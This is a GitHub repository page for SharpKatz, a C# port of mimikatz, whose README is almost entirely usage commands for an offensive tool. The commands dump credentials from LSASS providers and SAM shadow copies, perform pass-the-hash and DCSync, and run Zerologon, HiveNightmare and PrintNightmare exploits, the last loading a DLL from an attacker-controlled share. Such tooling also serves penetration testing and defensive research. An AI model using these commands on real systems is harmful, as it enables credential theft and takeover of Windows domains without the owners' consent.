Skip to content

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands

Notifications You must be signed in to change notification settings

fullstcat/SharpKatz

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

74 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SharpKatz

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands

Usage

Ekeys

SharpKatz.exe --Command ekeys
list Kerberos encryption keys

Msv

SharpKatz.exe --Command msv
Retrive user credentials from Msv provider

Kerberos

SharpKatz.exe --Command kerberos
Retrive user credentials from Kerberos provider

Tspkg

SharpKatz.exe --Command tspkg
Retrive user credentials from Tspkg provider

Credman

SharpKatz.exe --Command credman
Retrive user credentials from Credman provider

WDigest

SharpKatz.exe --Command wdigest
Retrive user credentials from WDigest provider

Logonpasswords

SharpKatz.exe --Command logonpasswords
Retrive user credentials from all providers

List shadowcopies

SharpKatz.exe --Command listshadows
Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject

Lsadumpsam

SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM
Dump credential from provided sam database

Pth

SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password

SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Perform pth to create a process under userdomain\username credential user's rc4 key

SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Replace ntlm hash for an existing logonsession

SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key

DCSync

SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Dump user credential by username

SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Dump user credential by GUID

SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Export the entire dataset from AD to a file created in the current user's temp forder

SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by username using alternative credentials

SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by GUID using alternative credentials

SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials

Zerologon

No reference to logoncli.dll, using the direct rpc call works even from a non-domain joined workstation

SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon check

SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon attack

SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by username

SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by GUID

SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder

Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed here

PrintNightmare CVE-2021-1675 - CVE-2021-34527

SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll
Perform PrintNightmare attack

SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Perform PrintNightmare attack with provided credentials

HiveNightmare CVE-2021-36934

SharpKatz.exe --Command hiveghtmare
Exploit HiveNightmare vulnerability selecting the first available shadowcopy

Credits

This project depends entirely on the work of Benjamin Delpy and Vincent Le Toux on Mimikatz and MakeMeEnterpriseAdmin projects.
The analysis of the code was conducted following the example from this blog post by xpn.

About

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages

  • C# 100.0%